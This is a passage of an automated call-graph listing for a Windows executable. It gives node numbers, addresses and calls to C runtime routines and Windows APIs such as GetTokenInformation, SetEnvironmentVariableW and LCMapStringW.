_set_fmode 11 API calls 17504->17505 17505->17502 17507 7ff7ead085b1 GetTokenInformation 17506->17507 17508 7ff7ead08633 __vcrt_freefls 17506->17508 17509 7ff7ead085d2 GetLastError 17507->17509 17512 7ff7ead085dd 17507->17512 17510 7ff7ead0864c 17508->17510 17511 7ff7ead08646 CloseHandle 17508->17511 17509->17508 17509->17512 17510->16647 17511->17510 17512->17508 17513 7ff7ead085f9 GetTokenInformation 17512->17513 17513->17508 17514 7ff7ead0861c 17513->17514 17514->17508 17515 7ff7ead08626 ConvertSidToStringSidW 17514->17515 17515->17508 17517 7ff7ead0c850 17516->17517 17518 7ff7ead02b74 GetCurrentProcessId 17517->17518 17519 7ff7ead026b0 48 API calls 17518->17519 17520 7ff7ead02bc7 17519->17520 17521 7ff7ead14bd8 48 API calls 17520->17521 17522 7ff7ead02c10 MessageBoxW 17521->17522 17523 7ff7ead0c550 _log10_special 8 API calls 17522->17523 17524 7ff7ead02c40 17523->17524 17524->16657 17526 7ff7ead025e5 17525->17526 17527 7ff7ead14bd8 48 API calls 17526->17527 17528 7ff7ead02604 17527->17528 17528->16673 17533 7ff7ead081dc 17532->17533 17534 7ff7ead09390 2 API calls 17533->17534 17722 7ff7ead0456a 17721->17722 17723 7ff7ead09390 2 API calls 17722->17723 17724 7ff7ead0458f 17723->17724 17725 7ff7ead0c550 _log10_special 8 API calls 17724->17725 17726 7ff7ead045b7 17725->17726 17726->16710 17729 7ff7ead07e2e 17727->17729 17728 7ff7ead07f52 17731 7ff7ead0c550 _log10_special 8 API calls 17728->17731 17729->17728 17730 7ff7ead01c80 49 API calls 17729->17730 17732 7ff7ead07eb5 17730->17732 17733 7ff7ead07f83 17731->17733 17732->17728 17734 7ff7ead01c80 49 API calls 17732->17734 17735 7ff7ead04560 10 API calls 17732->17735 17736 7ff7ead07f0b 17732->17736 17733->16710 17734->17732 17735->17732 17737 7ff7ead09390 2 API calls 17736->17737 17740 7ff7ead01613 17739->17740 17741 7ff7ead01637 17739->17741 17860 7ff7ead01050 17740->17860 17742 7ff7ead045c0 108 API calls 17741->17742 17745 7ff7ead0164b 17742->17745 17747 7ff7ead01653 17745->17747 17748 7ff7ead01682 17745->17748 17750 7ff7ead14f08 _set_fmode 11 API calls 17747->17750 17751 7ff7ead045c0 108 API calls 17748->17751 17788 7ff7ead07144 17787->17788 17789 7ff7ead0718b 17787->17789 17788->17789 17924 7ff7ead15024 17788->17924 17789->16710 17792 7ff7ead041a1 17791->17792 17793 7ff7ead044e0 49 API calls 17792->17793 17794 7ff7ead041db 17793->17794 17795 7ff7ead044e0 49 API calls 17794->17795 17796 7ff7ead041eb 17795->17796 17797 7ff7ead0420d 17796->17797 17798 7ff7ead0423c 17796->17798 17836 7ff7ead01c80 49 API calls 17835->17836 17837 7ff7ead04474 17836->17837 17837->16710 17861 7ff7ead045c0 108 API calls 17860->17861 17862 7ff7ead0108c 17861->17862 17863 7ff7ead01094 17862->17863 17864 7ff7ead010a9 17862->17864 17925 7ff7ead1505e 17924->17925 17926 7ff7ead15031 17924->17926 17927 7ff7ead15081 17925->17927 17930 7ff7ead1509d 17925->17930 17928 7ff7ead14f08 _set_fmode 11 API calls 17926->17928 17935 7ff7ead14fe8 17926->17935 17929 7ff7ead14f08 _set_fmode 11 API calls 17927->17929 17931 7ff7ead1503b 17928->17931 17933 7ff7ead14f4c 45 API calls 17930->17933 17935->17788 18005 7ff7ead15ec8 18002->18005 18003 7ff7ead15eee 18004 7ff7ead14f08 _set_fmode 11 API calls 18003->18004 18007 7ff7ead15ef3 18004->18007 18005->18003 18006 7ff7ead15f21 18005->18006 18008 7ff7ead15f27 18006->18008 18009 7ff7ead15f34 18006->18009 18010 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 18007->18010 18011 7ff7ead14f08 _set_fmode 11 API calls 18008->18011 18021 7ff7ead1ac28 18009->18021 18013 7ff7ead04616 18010->18013 18011->18013 18013->16735 18034 7ff7ead202d8 EnterCriticalSection 18021->18034 18395 7ff7ead178f8 18394->18395 18398 7ff7ead173d4 18395->18398 18397 7ff7ead17911 18397->16743 18399 7ff7ead1741e 18398->18399 18400 7ff7ead173ef 18398->18400 18408 7ff7ead1546c EnterCriticalSection 18399->18408 18401 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 18400->18401 18407 7ff7ead1740f 18401->18407 18407->18397 18410 7ff7ead0fe71 18409->18410 18411 7ff7ead0fe43 18409->18411 18418 7ff7ead0fe63 18410->18418 18419 7ff7ead1546c EnterCriticalSection 18410->18419 18412 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 18411->18412 18412->18418 18418->16749 18421 7ff7ead045c0 108 API calls 18420->18421 18527 7ff7ead06375 18526->18527 18528 7ff7ead01c80 49 API calls 18527->18528 18529 7ff7ead063b1 18528->18529 18530 7ff7ead063dd 18529->18530 18531 7ff7ead063ba 18529->18531 18533 7ff7ead04630 49 API calls 18530->18533 18532 7ff7ead02710 54 API calls 18531->18532 18556 7ff7ead063d3 18532->18556 18816 7ff7ead1b150 __GetCurrentState 45 API calls 18815->18816 18817 7ff7ead1a3e1 18816->18817 18818 7ff7ead1a504 __GetCurrentState 45 API calls 18817->18818 18819 7ff7ead1a401 18818->18819 19444 7ff7ead208c8 19445 7ff7ead208ec 19444->19445 19448 7ff7ead208fc 19444->19448 19446 7ff7ead14f08 _set_fmode 11 API calls 19445->19446 19469 7ff7ead208f1 19446->19469 19447 7ff7ead20bdc 19449 7ff7ead14f08 _set_fmode 11 API calls 19447->19449 19448->19447 19450 7ff7ead2091e 19448->19450 19451 7ff7ead20be1 19449->19451 19452 7ff7ead2093f 19450->19452 19575 7ff7ead20f84 19450->19575 19453 7ff7ead1a948 __free_lconv_num 11 API calls 19451->19453 19455 7ff7ead209b1 19452->19455 19457 7ff7ead20965 19452->19457 19461 7ff7ead209a5 19452->19461 19453->19469 19459 7ff7ead1eb98 _set_fmode 11 API calls 19455->19459 19474 7ff7ead20974 19455->19474 19456 7ff7ead20a5e 19468 7ff7ead20a7b 19456->19468 19475 7ff7ead20acd 19456->19475 19590 7ff7ead196c0 19457->19590 19462 7ff7ead209c7 19459->19462 19461->19456 19461->19474 19596 7ff7ead2712c 19461->19596 19465 7ff7ead1a948 __free_lconv_num 11 API calls 19462->19465 19464 7ff7ead1a948 __free_lconv_num 11 API calls 19464->19469 19470 7ff7ead209d5 19465->19470 19466 7ff7ead2098d 19466->19461 19473 7ff7ead20f84 45 API calls 19466->19473 19467 7ff7ead2096f 19471 7ff7ead14f08 _set_fmode 11 API calls 19467->19471 19472 7ff7ead1a948 __free_lconv_num 11 API calls 19468->19472 19470->19461 19470->19474 19478 7ff7ead1eb98 _set_fmode 11 API calls 19470->19478 19471->19474 19476 7ff7ead20a84 19472->19476 19473->19461 19474->19464 19475->19474 19477 7ff7ead233dc 40 API calls 19475->19477 19484 7ff7ead20a89 19476->19484 19632 7ff7ead233dc 19476->19632 19479 7ff7ead20b0a 19477->19479 19481 7ff7ead209f7 19478->19481 19482 7ff7ead1a948 __free_lconv_num 11 API calls 19479->19482 19487 7ff7ead1a948 __free_lconv_num 11 API calls 19481->19487 19483 7ff7ead20b14 19482->19483 19483->19474 19483->19484 19485 7ff7ead20bd0 19484->19485 19490 7ff7ead1eb98 _set_fmode 11 API calls 19484->19490 19489 7ff7ead1a948 __free_lconv_num 11 API calls 19485->19489 19486 7ff7ead20ab5 19488 7ff7ead1a948 __free_lconv_num 11 API calls 19486->19488 19487->19461 19488->19484 19489->19469 19491 7ff7ead20b58 19490->19491 19492 7ff7ead20b69 19491->19492 19493 7ff7ead20b60 19491->19493 19495 7ff7ead1a4a4 __std_exception_copy 37 API calls 19492->19495 19494 7ff7ead1a948 __free_lconv_num 11 API calls 19493->19494 19496 7ff7ead20b67 19494->19496 19497 7ff7ead20b78 19495->19497 19502 7ff7ead1a948 __free_lconv_num 11 API calls 19496->19502 19498 7ff7ead20c0b 19497->19498 19499 7ff7ead20b80 19497->19499 19501 7ff7ead1a900 _isindst 17 API calls 19498->19501 19641 7ff7ead27244 19499->19641 19504 7ff7ead20c1f 19501->19504 19502->19469 19507 7ff7ead20c48 19504->19507 19515 7ff7ead20c58 19504->19515 19505 7ff7ead20bc8 19510 7ff7ead1a948 __free_lconv_num 11 API calls 19505->19510 19506 7ff7ead20ba7 19508 7ff7ead14f08 _set_fmode 11 API calls 19506->19508 19509 7ff7ead14f08 _set_fmode 11 API calls 19507->19509 19511 7ff7ead20bac 19508->19511 19512 7ff7ead20c4d 19509->19512 19510->19485 19513 7ff7ead1a948 __free_lconv_num 11 API calls 19511->19513 19513->19496 19514 7ff7ead20f3b 19516 7ff7ead14f08 _set_fmode 11 API calls 19514->19516 19515->19514 19517 7ff7ead20c7a 19515->19517 19519 7ff7ead20f40 19516->19519 19518 7ff7ead20c97 19517->19518 19660 7ff7ead2106c 19517->19660 19522 7ff7ead20d0b 19518->19522 19524 7ff7ead20cbf 19518->19524 19531 7ff7ead20cff 19518->19531 19521 7ff7ead1a948 __free_lconv_num 11 API calls 19519->19521 19521->19512 19527 7ff7ead1eb98 _set_fmode 11 API calls 19522->19527 19540 7ff7ead20cce 19522->19540 19545 7ff7ead20d33 19522->19545 19523 7ff7ead20dbe 19536 7ff7ead20ddb 19523->19536 19539 7ff7ead20e2e 19523->19539 19675 7ff7ead196fc 19524->19675 19532 7ff7ead20d25 19527->19532 19529 7ff7ead1eb98 _set_fmode 11 API calls 19535 7ff7ead20d55 19529->19535 19530 7ff7ead1a948 __free_lconv_num 11 API calls 19530->19512 19531->19523 19531->19540 19681 7ff7ead26fec 19531->19681 19537 7ff7ead1a948 __free_lconv_num 11 API calls 19532->19537 19533 7ff7ead20ce7 19533->19531 19544 7ff7ead2106c 45 API calls 19533->19544 19534 7ff7ead20cc9 19538 7ff7ead14f08 _set_fmode 11 API calls 19534->19538 19541 7ff7ead1a948 __free_lconv_num 11 API calls 19535->19541 19542 7ff7ead1a948 __free_lconv_num 11 API calls 19536->19542 19537->19545 19538->19540 19539->19540 19546 7ff7ead233dc 40 API calls 19539->19546 19540->19530 19541->19531 19543 7ff7ead20de4 19542->19543 19549 7ff7ead233dc 40 API calls 19543->19549 19551 7ff7ead20dea 19543->19551 19544->19531 19545->19529 19545->19531 19545->19540 19547 7ff7ead20e6c 19546->19547 19548 7ff7ead1a948 __free_lconv_num 11 API calls 19547->19548 19550 7ff7ead20e76 19548->19550 19553 7ff7ead20e16 19549->19553 19550->19540 19550->19551 19552 7ff7ead20f2f 19551->19552 19556 7ff7ead1eb98 _set_fmode 11 API calls 19551->19556 19555 7ff7ead1a948 __free_lconv_num 11 API calls 19552->19555 19554 7ff7ead1a948 __free_lconv_num 11 API calls 19553->19554 19554->19551 19555->19512 19557 7ff7ead20ebb 19556->19557 19558 7ff7ead20ecc 19557->19558 19559 7ff7ead20ec3 19557->19559 19561 7ff7ead20474 37 API calls 19558->19561 19560 7ff7ead1a948 __free_lconv_num 11 API calls 19559->19560 19563 7ff7ead20eca 19560->19563 19562 7ff7ead20eda 19561->19562 19564 7ff7ead20f6f 19562->19564 19565 7ff7ead20ee2 SetEnvironmentVariableW 19562->19565 19569 7ff7ead1a948 __free_lconv_num 11 API calls 19563->19569 19568 7ff7ead1a900 _isindst 17 API calls 19564->19568 19566 7ff7ead20f27 19565->19566 19567 7ff7ead20f06 19565->19567 19572 7ff7ead1a948 __free_lconv_num 11 API calls 19566->19572 19570 7ff7ead14f08 _set_fmode 11 API calls 19567->19570 19571 7ff7ead20f83 19568->19571 19569->19512 19573 7ff7ead20f0b 19570->19573 19572->19552 19574 7ff7ead1a948 __free_lconv_num 11 API calls 19573->19574 19574->19563 19576 7ff7ead20fb9 19575->19576 19583 7ff7ead20fa1 19575->19583 19577 7ff7ead1eb98 _set_fmode 11 API calls 19576->19577 19585 7ff7ead20fdd 19577->19585 19578 7ff7ead21062 19579 7ff7ead1a504 __GetCurrentState 45 API calls 19578->19579 19581 7ff7ead21068 19579->19581 19580 7ff7ead2103e 19582 7ff7ead1a948 __free_lconv_num 11 API calls 19580->19582 19582->19583 19583->19452 19584 7ff7ead1eb98 _set_fmode 11 API calls 19584->19585 19585->19578 19585->19580 19585->19584 19586 7ff7ead1a948 __free_lconv_num 11 API calls 19585->19586 19587 7ff7ead1a4a4 __std_exception_copy 37 API calls 19585->19587 19588 7ff7ead2104d 19585->19588 19586->19585 19587->19585 19589 7ff7ead1a900 _isindst 17 API calls 19588->19589 19589->19578 19591 7ff7ead196d0 19590->19591 19592 7ff7ead196d9 19590->19592 19591->19592 19705 7ff7ead19198 19591->19705 19592->19466 19592->19467 19597 7ff7ead27139 19596->19597 19598 7ff7ead26254 19596->19598 19600 7ff7ead14f4c 45 API calls 19597->19600 19599 7ff7ead26261 19598->19599 19607 7ff7ead26297 19598->19607 19602 7ff7ead14f08 _set_fmode 11 API calls 19599->19602 19616 7ff7ead26208 19599->19616 19601 7ff7ead2716d 19600->19601 19604 7ff7ead27172 19601->19604 19608 7ff7ead27183 19601->19608 19612 7ff7ead2719a 19601->19612 19605 7ff7ead2626b 19602->19605 19603 7ff7ead262c1 19606 7ff7ead14f08 _set_fmode 11 API calls 19603->19606 19604->19461 19609 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 19605->19609 19610 7ff7ead262c6 19606->19610 19607->19603 19611 7ff7ead262e6 19607->19611 19613 7ff7ead14f08 _set_fmode 11 API calls 19608->19613 19614 7ff7ead26276 19609->19614 19615 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 19610->19615 19617 7ff7ead14f4c 45 API calls 19611->19617 19623 7ff7ead262d1 19611->19623 19619 7ff7ead271a4 19612->19619 19620 7ff7ead271b6 19612->19620 19618 7ff7ead27188 19613->19618 19614->19461 19615->19623 19616->19461 19617->19623 19624 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 19618->19624 19625 7ff7ead14f08 _set_fmode 11 API calls 19619->19625 19621 7ff7ead271c7 19620->19621 19622 7ff7ead271de 19620->19622 19928 7ff7ead262a4 19621->19928 19937 7ff7ead28f4c 19622->19937 19623->19461 19624->19604 19628 7ff7ead271a9 19625->19628 19630 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 19628->19630 19630->19604 19631 7ff7ead14f08 _set_fmode 11 API calls 19631->19604 19633 7ff7ead2341b 19632->19633 19634 7ff7ead233fe 19632->19634 19638 7ff7ead23425 19633->19638 19977 7ff7ead27c38 19633->19977 19634->19633 19635 7ff7ead2340c 19634->19635 19636 7ff7ead14f08 _set_fmode 11 API calls 19635->19636 19640 7ff7ead23411 __scrt_get_show_window_mode 19636->19640 19984 7ff7ead27c74 19638->19984 19640->19486 19642 7ff7ead14f4c 45 API calls 19641->19642 19643 7ff7ead272aa 19642->19643 19645 7ff7ead272b8 19643->19645 19996 7ff7ead1ef24 19643->19996 19999 7ff7ead154ac 19645->19999 19648 7ff7ead273a4 19651 7ff7ead273b5 19648->19651 19652 7ff7ead1a948 __free_lconv_num 11 API calls 19648->19652 19649 7ff7ead14f4c 45 API calls 19650 7ff7ead27327 19649->19650 19654 7ff7ead1ef24 5 API calls 19650->19654 19659 7ff7ead27330 19650->19659 19653 7ff7ead20ba3 19651->19653 19655 7ff7ead1a948 __free_lconv_num 11 API calls 19651->19655 19652->19651 19653->19505 19653->19506 19654->19659 19655->19653 19656 7ff7ead154ac 14 API calls 19657 7ff7ead2738b 19656->19657 19657->19648 19658 7ff7ead27393 SetEnvironmentVariableW 19657->19658 19658->19648 19659->19656 19661 7ff7ead210ac 19660->19661 19668 7ff7ead2108f 19660->19668 19662 7ff7ead1eb98 _set_fmode 11 API calls 19661->19662 19671 7ff7ead210d0 19662->19671 19663 7ff7ead21154 19665 7ff7ead1a504 __GetCurrentState 45 API calls 19663->19665 19664 7ff7ead21131 19667 7ff7ead1a948 __free_lconv_num 11 API calls 19664->19667 19666 7ff7ead2115a 19665->19666 19667->19668 19668->19518 19669 7ff7ead1eb98 _set_fmode 11 API calls 19669->19671 19670 7ff7ead1a948 __free_lconv_num 11 API calls 19670->19671 19671->19663 19671->19664 19671->19669 19671->19670 19672 7ff7ead20474 37 API calls 19671->19672 19673 7ff7ead21140 19671->19673 19672->19671 19674 7ff7ead1a900 _isindst 17 API calls 19673->19674 19674->19663 19676 7ff7ead1970c 19675->19676 19677 7ff7ead19715 19675->19677 19676->19677 20021 7ff7ead1920c 19676->20021 19677->19533 19677->19534 19682 7ff7ead26ff9 19681->19682 19686 7ff7ead27026 19681->19686 19683 7ff7ead26ffe 19682->19683 19682->19686 19684 7ff7ead14f08 _set_fmode 11 API calls 19683->19684 19687 7ff7ead27003 19684->19687 19685 7ff7ead2706a 19688 7ff7ead14f08 _set_fmode 11 API calls 19685->19688 19686->19685 19689 7ff7ead27089 19686->19689 19702 7ff7ead2705e __crtLCMapStringW 19686->19702 19690 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 19687->19690 19691 7ff7ead2706f 19688->19691 19692 7ff7ead27093 19689->19692 19693 7ff7ead270a5 19689->19693 19694 7ff7ead2700e 19690->19694 19695 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 19691->19695 19696 7ff7ead14f08 _set_fmode 11 API calls 19692->19696 19697 7ff7ead14f4c 45 API calls 19693->19697 19694->19531 19695->19702 19699 7ff7ead27098 19696->19699 19698 7ff7ead270b2 19697->19698 19698->19702 20068 7ff7ead28b08 19698->20068 19700 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 19699->19700 19700->19702 19702->19531 19704 7ff7ead14f08 _set_fmode 11 API calls 19704->19702 19706 7ff7ead191b1 19705->19706 19715 7ff7ead191ad 19705->19715 19728 7ff7ead225f0 19706->19728 19711 7ff7ead191cf 19754 7ff7ead1927c 19711->19754 19712 7ff7ead191c3 19713 7ff7ead1a948 __free_lconv_num 11 API calls 19712->19713 19713->19715 19715->19592 19720 7ff7ead194ec 19715->19720 19717 7ff7ead1a948 __free_lconv_num 11 API calls 19718 7ff7ead191f6 19717->19718 19719 7ff7ead1a948 __free_lconv_num 11 API calls 19718->19719 19719->19715 19725 7ff7ead1952e 19720->19725 19726 7ff7ead19515 19720->19726 19721 7ff7ead207e8 WideCharToMultiByte 19721->19725 19722 7ff7ead1eb98 _set_fmode 11 API calls 19722->19725 19723 7ff7ead195be 19724 7ff7ead1a948 __free_lconv_num 11 API calls 19723->19724 19724->19726 19725->19721 19725->19722 19725->19723 19725->19726 19727 7ff7ead1a948 __free_lconv_num 11 API calls 19725->19727 19726->19592 19727->19725 19729 7ff7ead191b6 19728->19729 19730 7ff7ead225fd 19728->19730 19734 7ff7ead2292c GetEnvironmentStringsW 19729->19734 19773 7ff7ead1b224 19730->19773 19735 7ff7ead2295c 19734->19735 19736 7ff7ead191bb 19734->19736 19737 7ff7ead207e8 WideCharToMultiByte 19735->19737 19736->19711 19736->19712 19738 7ff7ead229ad 19737->19738 19739 7ff7ead229b4 FreeEnvironmentStringsW 19738->19739 19740 7ff7ead1d5fc _fread_nolock 12 API calls 19738->19740 19739->19736 19741 7ff7ead229c7 19740->19741 19742 7ff7ead229d8 19741->19742 19743 7ff7ead229cf 19741->19743 19745 7ff7ead207e8 WideCharToMultiByte 19742->19745 19744 7ff7ead1a948 __free_lconv_num 11 API calls 19743->19744 19746 7ff7ead229d6 19744->19746 19747 7ff7ead229fb 19745->19747 19746->19739 19748 7ff7ead22a09 19747->19748 19749 7ff7ead229ff 19747->19749 19751 7ff7ead1a948 __free_lconv_num 11 API calls 19748->19751 19750 7ff7ead1a948 __free_lconv_num 11 API calls 19749->19750 19752 7ff7ead22a07 FreeEnvironmentStringsW 19750->19752 19751->19752 19752->19736 19755 7ff7ead192a1 19754->19755 19756 7ff7ead1eb98 _set_fmode 11 API calls 19755->19756 19769 7ff7ead192d7 19756->19769 19757 7ff7ead192df 19758 7ff7ead1a948 __free_lconv_num 11 API calls 19757->19758 19760 7ff7ead191d7 19758->19760 19759 7ff7ead19352 19761 7ff7ead1a948 __free_lconv_num 11 API calls 19759->19761 19760->19717 19761->19760 19762 7ff7ead1eb98 _set_fmode 11 API calls 19762->19769 19763 7ff7ead19341 19922 7ff7ead194a8 19763->19922 19764 7ff7ead1a4a4 __std_exception_copy 37 API calls 19764->19769 19767 7ff7ead1a948 __free_lconv_num 11 API calls 19767->19757 19768 7ff7ead19377 19770 7ff7ead1a900 _isindst 17 API calls 19768->19770 19769->19757 19769->19759 19769->19762 19769->19763 19769->19764 19769->19768 19771 7ff7ead1a948 __free_lconv_num 11 API calls 19769->19771 19772 7ff7ead1938a 19770->19772 19771->19769 19774 7ff7ead1b250 FlsSetValue 19773->19774 19775 7ff7ead1b235 FlsGetValue 19773->19775 19777 7ff7ead1b242 19774->19777 19778 7ff7ead1b25d 19774->19778 19776 7ff7ead1b24a 19775->19776 19775->19777 19776->19774 19779 7ff7ead1b248 19777->19779 19780 7ff7ead1a504 __GetCurrentState 45 API calls 19777->19780 19781 7ff7ead1eb98 _set_fmode 11 API calls 19778->19781 19793 7ff7ead222c4 19779->19793 19782 7ff7ead1b2c5 19780->19782 19783 7ff7ead1b26c 19781->19783 19784 7ff7ead1b28a FlsSetValue 19783->19784 19785 7ff7ead1b27a FlsSetValue 19783->19785 19786 7ff7ead1b2a8 19784->19786 19787 7ff7ead1b296 FlsSetValue 19784->19787 19788 7ff7ead1b283 19785->19788 19790 7ff7ead1aef4 _set_fmode 11 API calls 19786->19790 19787->19788 19789 7ff7ead1a948 __free_lconv_num 11 API calls 19788->19789 19789->19777 19791 7ff7ead1b2b0 19790->19791 19792 7ff7ead1a948 __free_lconv_num 11 API calls 19791->19792 19792->19779 19816 7ff7ead22534 19793->19816 19795 7ff7ead222f9 19831 7ff7ead21fc4 19795->19831 19798 7ff7ead1d5fc _fread_nolock 12 API calls 19799 7ff7ead22327 19798->19799 19800 7ff7ead2232f 19799->19800 19802 7ff7ead2233e 19799->19802 19801 7ff7ead1a948 __free_lconv_num 11 API calls 19800->19801 19814 7ff7ead22316 19801->19814 19802->19802 19838 7ff7ead2266c 19802->19838 19805 7ff7ead2243a 19806 7ff7ead14f08 _set_fmode 11 API calls 19805->19806 19807 7ff7ead2243f 19806->19807 19811 7ff7ead1a948 __free_lconv_num 11 API calls 19807->19811 19808 7ff7ead22454 19809 7ff7ead22495 19808->19809 19815 7ff7ead1a948 __free_lconv_num 11 API calls 19808->19815 19810 7ff7ead224fc 19809->19810 19849 7ff7ead21df4 19809->19849 19813 7ff7ead1a948 __free_lconv_num 11 API calls 19810->19813 19811->19814 19813->19814 19814->19729 19815->19809 19817 7ff7ead22557 19816->19817 19818 7ff7ead22561 19817->19818 19864 7ff7ead202d8 EnterCriticalSection 19817->19864 19822 7ff7ead225d3 19818->19822 19823 7ff7ead1a504 __GetCurrentState 45 API calls 19818->19823 19822->19795 19825 7ff7ead225eb 19823->19825 19827 7ff7ead22642 19825->19827 19828 7ff7ead1b224 50 API calls 19825->19828 19827->19795 19829 7ff7ead2262c 19828->19829 19830 7ff7ead222c4 65 API calls 19829->19830 19830->19827 19832 7ff7ead14f4c 45 API calls 19831->19832 19833 7ff7ead21fd8 19832->19833 19834 7ff7ead21fe4 GetOEMCP 19833->19834 19835 7ff7ead21ff6 19833->19835 19836 7ff7ead2200b 19834->19836 19835->19836 19837 7ff7ead21ffb GetACP 19835->19837 19836->19798 19836->19814 19837->19836 19839 7ff7ead21fc4 47 API calls 19838->19839 19840 7ff7ead22699 19839->19840 19841 7ff7ead227ef 19840->19841 19843 7ff7ead226d6 IsValidCodePage 19840->19843 19848 7ff7ead226f0 __scrt_get_show_window_mode 19840->19848 19842 7ff7ead0c550 _log10_special 8 API calls 19841->19842 19844 7ff7ead22431 19842->19844 19843->19841 19845 7ff7ead226e7 19843->19845 19844->19805 19844->19808 19846 7ff7ead22716 GetCPInfo 19845->19846 19845->19848 19846->19841 19846->19848 19865 7ff7ead220dc 19848->19865 19921 7ff7ead202d8 EnterCriticalSection 19849->19921 19866 7ff7ead22119 GetCPInfo 19865->19866 19875 7ff7ead2220f 19865->19875 19867 7ff7ead2212c 19866->19867 19866->19875 19870 7ff7ead22e40 48 API calls 19867->19870 19868 7ff7ead0c550 _log10_special 8 API calls 19869 7ff7ead222ae 19868->19869 19869->19841 19871 7ff7ead221a3 19870->19871 19876 7ff7ead27b84 19871->19876 19874 7ff7ead27b84 54 API calls 19874->19875 19875->19868 19877 7ff7ead14f4c 45 API calls 19876->19877 19878 7ff7ead27ba9 19877->19878 19881 7ff7ead27850 19878->19881 19882 7ff7ead27891 19881->19882 19883 7ff7ead1f8a0 _fread_nolock MultiByteToWideChar 19882->19883 19887 7ff7ead278db 19883->19887 19884 7ff7ead27b59 19886 7ff7ead0c550 _log10_special 8 API calls 19884->19886 19885 7ff7ead27a11 19885->19884 19890 7ff7ead1a948 __free_lconv_num 11 API calls 19885->19890 19888 7ff7ead221d6 19886->19888 19887->19884 19887->19885 19889 7ff7ead1d5fc _fread_nolock 12 API calls 19887->19889 19891 7ff7ead27913 19887->19891 19888->19874 19889->19891 19890->19884 19891->19885 19892 7ff7ead1f8a0 _fread_nolock MultiByteToWideChar 19891->19892 19893 7ff7ead27986 19892->19893 19893->19885 19912 7ff7ead1f0e4 19893->19912 19896 7ff7ead27a22 19898 7ff7ead1d5fc _fread_nolock 12 API calls 19896->19898 19900 7ff7ead27af4 19896->19900 19901 7ff7ead27a40 19896->19901 19897 7ff7ead279d1 19897->19885 19899 7ff7ead1f0e4 __crtLCMapStringW 6 API calls 19897->19899 19898->19901 19899->19885 19900->19885 19902 7ff7ead1a948 __free_lconv_num 11 API calls 19900->19902 19901->19885 19903 7ff7ead1f0e4 __crtLCMapStringW 6 API calls 19901->19903 19902->19885 19904 7ff7ead27ac0 19903->19904 19904->19900 19905 7ff7ead27ae0 19904->19905 19906 7ff7ead27af6 19904->19906 19907 7ff7ead207e8 WideCharToMultiByte 19905->19907 19908 7ff7ead207e8 WideCharToMultiByte 19906->19908 19909 7ff7ead27aee 19907->19909 19908->19909 19909->19900 19910 7ff7ead27b0e 19909->19910 19910->19885 19911 7ff7ead1a948 __free_lconv_num 11 API calls 19910->19911 19911->19885 19913 7ff7ead1ed10 __crtLCMapStringW 5 API calls 19912->19913 19914 7ff7ead1f122 19913->19914 19917 7ff7ead1f12a 19914->19917 19918 7ff7ead1f1d0 19914->19918 19916 7ff7ead1f193 LCMapStringW 19916->19917 19917->19885 19917->19896 19917->19897 19919 7ff7ead1ed10 __crtLCMapStringW 5 API calls 19918->19919 19920 7ff7ead1f1fe __crtLCMapStringW 19919->19920 19920->19916 19923 7ff7ead194ad 19922->19923 19927 7ff7ead19349 19922->19927 19924 7ff7ead194d6 19923->19924 19925 7ff7ead1a948 __free_lconv_num 11 API calls 19923->19925 19926 7ff7ead1a948 __free_lconv_num 11 API calls 19924->19926 19925->19923 19926->19927 19927->19767 19929 7ff7ead262d8 19928->19929 19930 7ff7ead262c1 19928->19930 19929->19930 19933 7ff7ead262e6 19929->19933 19931 7ff7ead14f08 _set_fmode 11 API calls 19930->19931 19932 7ff7ead262c6 19931->19932 19934 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 19932->19934 19935 7ff7ead14f4c 45 API calls 19933->19935 19936 7ff7ead262d1 19933->19936 19934->19936 19935->19936 19936->19604 19938 7ff7ead14f4c 45 API calls 19937->19938 19939 7ff7ead28f71 19938->19939 19942 7ff7ead28bc8 19939->19942 19945 7ff7ead28c16 19942->19945 19943 7ff7ead0c550 _log10_special 8 API calls 19944 7ff7ead27205 19943->19944 19944->19604 19944->19631 19946 7ff7ead28c9d 19945->19946 19948 7ff7ead28c88 GetCPInfo 19945->19948 19951 7ff7ead28ca1 19945->19951 19947 7ff7ead1f8a0 _fread_nolock MultiByteToWideChar 19946->19947 19946->19951 19949 7ff7ead28d35 19947->19949 19948->19946 19948->19951 19950 7ff7ead1d5fc _fread_nolock 12 API calls 19949->19950 19949->19951 19952 7ff7ead28d6c 19949->19952 19950->19952 19951->19943 19952->19951 19953 7ff7ead1f8a0 _fread_nolock MultiByteToWideChar 19952->19953 19954 7ff7ead28dda 19953->19954 19955 7ff7ead1f8a0 _fread_nolock MultiByteToWideChar 19954->19955 19965 7ff7ead28ebc 19954->19965 19957 7ff7ead28e00 19955->19957 19956 7ff7ead1a948 __free_lconv_num 11 API calls 19956->19951 19958 7ff7ead1d5fc _fread_nolock 12 API calls 19957->19958 19959 7ff7ead28e2d 19957->19959 19957->19965 19958->19959 19960 7ff7ead1f8a0 _fread_nolock MultiByteToWideChar 19959->19960 19959->19965 19961 7ff7ead28ea4 19960->19961 19962 7ff7ead28eaa 19961->19962 19963 7ff7ead28ec4 19961->19963 19962->19965 19967 7ff7ead1a948 __free_lconv_num 11 API calls 19962->19967 19971 7ff7ead1ef68 19963->19971 19965->19951 19965->19956 19967->19965 19968 7ff7ead28f03 19968->19951 19970 7ff7ead1a948 __free_lconv_num 11 API calls 19968->19970 19969 7ff7ead1a948 __free_lconv_num 11 API calls 19969->19968 19970->19951 19972 7ff7ead1ed10 __crtLCMapStringW 5 API calls 19971->19972 19973 7ff7ead1efa6 19972->19973 19974 7ff7ead1f1d0 __crtLCMapStringW 5 API calls 19973->19974 19976 7ff7ead1efae 19973->19976 19975 7ff7ead1f017 CompareStringW 19974->19975 19975->19976 19976->19968 19976->19969 19978 7ff7ead27c5a HeapSize 19977->19978 19979 7ff7ead27c41 19977->19979 19980 7ff7ead14f08 _set_fmode 11 API calls 19979->19980 19981 7ff7ead27c46 19980->19981 19982 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 19981->19982 19983 7ff7ead27c51 19982->19983 19983->19638 19985 7ff7ead27c89 